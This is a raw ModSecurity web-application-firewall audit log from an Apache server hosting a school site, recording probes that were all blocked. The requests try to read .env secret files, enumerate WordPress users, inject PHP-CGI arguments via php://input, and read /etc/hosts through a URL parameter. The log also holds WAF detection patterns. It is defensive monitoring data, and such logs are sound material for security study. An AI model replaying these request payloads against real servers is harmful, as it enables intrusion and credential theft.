--c6d9293b-Z-- --3a8e1c6b-A-- [11/Jun/2025:06:46:35 +0700] aEjD22HSTY1pa5XXpU0nvAAAAEY 103.236.140.4 36756 103.236.140.4 8181 --3a8e1c6b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --3a8e1c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a8e1c6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749599195992813 902 (- - -) Stopwatch2: 1749599195992813 902; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a8e1c6b-Z-- --553d665b-A-- [11/Jun/2025:06:49:07 +0700] aEjEc2HSTY1pa5XXpU0nygAAAEY 103.236.140.4 36806 103.236.140.4 8181 --553d665b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.234.217.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.234.217.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --553d665b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --553d665b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749599347024172 2706 (- - -) Stopwatch2: 1749599347024172 2706; combined=1205, p1=392, p2=785, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --553d665b-Z-- --4dc63037-A-- [11/Jun/2025:07:02:15 +0700] aEjHh5Kj8lJYHQZ0EnfLNgAAAII 103.236.140.4 36964 103.236.140.4 8181 --4dc63037-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --4dc63037-C-- --4dc63037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc63037-E-- --4dc63037-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749600135056758 4742 (- - -) Stopwatch2: 1749600135056758 4742; combined=2961, p1=490, p2=2427, p3=0, p4=0, p5=44, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc63037-Z-- --9fd54d5e-A-- [11/Jun/2025:07:39:23 +0700] aEjQO2HSTY1pa5XXpU0oTwAAAFc 103.236.140.4 37430 103.236.140.4 8181 --9fd54d5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.221.63.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.221.63.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9fd54d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fd54d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749602363768503 3134 (- - -) Stopwatch2: 1749602363768503 3134; combined=1297, p1=439, p2=828, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fd54d5e-Z-- --5658fb15-A-- [11/Jun/2025:08:02:29 +0700] aEjVpVZ8bXZTkbagOrDQEgAAAAk 103.236.140.4 37712 103.236.140.4 8181 --5658fb15-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5658fb15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5658fb15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749603749749547 708 (- - -) Stopwatch2: 1749603749749547 708; combined=267, p1=231, p2=0, p3=0, p4=0, p5=35, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5658fb15-Z-- --56fcfd6b-A-- [11/Jun/2025:08:13:24 +0700] aEjYNGHSTY1pa5XXpU0ooQAAAFE 103.236.140.4 37812 103.236.140.4 8181 --56fcfd6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.247.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.247.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56fcfd6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56fcfd6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749604404697043 3214 (- - -) Stopwatch2: 1749604404697043 3214; combined=1390, p1=514, p2=841, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56fcfd6b-Z-- --cd36c604-A-- [11/Jun/2025:08:27:35 +0700] aEjbh2HSTY1pa5XXpU0oyAAAAEc 103.236.140.4 37950 103.236.140.4 8181 --cd36c604-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.70.100.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd36c604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd36c604-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749605255551973 3218 (- - -) Stopwatch2: 1749605255551973 3218; combined=1348, p1=472, p2=840, p3=0, p4=0, p5=36, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd36c604-Z-- --35b6017c-A-- [11/Jun/2025:08:56:53 +0700] aEjiZWHSTY1pa5XXpU0o5gAAAEs 103.236.140.4 38196 103.236.140.4 8181 --35b6017c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --35b6017c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35b6017c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749607013058223 823 (- - -) Stopwatch2: 1749607013058223 823; combined=306, p1=261, p2=0, p3=0, p4=0, p5=45, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35b6017c-Z-- --0cdc0d26-A-- [11/Jun/2025:09:11:44 +0700] aEjl4JKj8lJYHQZ0EnfLeAAAAIU 103.236.140.4 38382 103.236.140.4 8181 --0cdc0d26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.143.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.143.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0cdc0d26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cdc0d26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749607904829262 661 (- - -) Stopwatch2: 1749607904829262 661; combined=265, p1=234, p2=0, p3=0, p4=0, p5=31, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cdc0d26-Z-- --01ece463-A-- [11/Jun/2025:09:43:06 +0700] aEjtOmHSTY1pa5XXpU0plgAAAFU 103.236.140.4 39048 103.236.140.4 8181 --01ece463-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.24.74 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --01ece463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ece463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749609786341490 871 (- - -) Stopwatch2: 1749609786341490 871; combined=374, p1=339, p2=0, p3=0, p4=0, p5=35, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ece463-Z-- --3f7f5667-A-- [11/Jun/2025:11:48:49 +0700] aEkKsZKj8lJYHQZ0EnfOdwAAAIw 103.236.140.4 43226 103.236.140.4 8181 --3f7f5667-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 155.94.155.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 155.94.155.19 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3f7f5667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7f5667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749617329908292 696 (- - -) Stopwatch2: 1749617329908292 696; combined=292, p1=259, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7f5667-Z-- --f5f0ff4f-A-- [11/Jun/2025:11:48:53 +0700] aEkKtWHSTY1pa5XXpU0rUwAAAEs 103.236.140.4 43236 103.236.140.4 8181 --f5f0ff4f-B-- GET /api/geojson?url=file:///etc/hosts HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 155.94.155.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 155.94.155.19 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --f5f0ff4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f0ff4f-E-- --f5f0ff4f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/geojson?url=file:///etc/hosts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749617333450369 2422 (- - -) Stopwatch2: 1749617333450369 2422; combined=690, p1=500, p2=158, p3=0, p4=0, p5=31, sr=85, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f0ff4f-Z-- --5f0bca04-A-- [11/Jun/2025:11:56:57 +0700] aEkMmVZ8bXZTkbagOrDRzAAAABc 103.236.140.4 43320 103.236.140.4 8181 --5f0bca04-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.11.224.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.11.224.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5f0bca04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f0bca04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749617817467636 3208 (- - -) Stopwatch2: 1749617817467636 3208; combined=1362, p1=484, p2=848, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f0bca04-Z-- --18de3d6c-A-- [11/Jun/2025:12:18:59 +0700] aEkRw1Z8bXZTkbagOrDSGwAAAAw 103.236.140.4 44710 103.236.140.4 8181 --18de3d6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --18de3d6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18de3d6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749619139435178 868 (- - -) Stopwatch2: 1749619139435178 868; combined=406, p1=366, p2=0, p3=0, p4=0, p5=39, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18de3d6c-Z-- --bdede034-A-- [11/Jun/2025:12:19:00 +0700] aEkRxGHSTY1pa5XXpU0rzAAAAEM 103.236.140.4 44738 103.236.140.4 8181 --bdede034-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --bdede034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdede034-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749619140915028 843 (- - -) Stopwatch2: 1749619140915028 843; combined=407, p1=372, p2=0, p3=0, p4=0, p5=35, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdede034-Z-- --08f1741a-A-- [11/Jun/2025:12:30:33 +0700] aEkUeZKj8lJYHQZ0EnfSYAAAAJg 103.236.140.4 58132 103.236.140.4 8181 --08f1741a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.222.88.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.222.88.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --08f1741a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08f1741a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749619833047245 3272 (- - -) Stopwatch2: 1749619833047245 3272; combined=1516, p1=512, p2=959, p3=0, p4=0, p5=45, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08f1741a-Z-- --f9f8672b-A-- [11/Jun/2025:13:29:47 +0700] aEkiW2HSTY1pa5XXpU0xeAAAAFE 103.236.140.4 38464 103.236.140.4 8181 --f9f8672b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --f9f8672b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f8672b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749623387974944 886 (- - -) Stopwatch2: 1749623387974944 886; combined=356, p1=313, p2=0, p3=0, p4=0, p5=43, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f8672b-Z-- --b994557c-A-- [11/Jun/2025:13:56:27 +0700] aEkom1Z8bXZTkbagOrDZ2QAAAAs 103.236.140.4 45510 103.236.140.4 8181 --b994557c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.255.62.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.255.62.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b994557c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b994557c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749624987254548 2516 (- - -) Stopwatch2: 1749624987254548 2516; combined=1184, p1=397, p2=759, p3=0, p4=0, p5=27, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 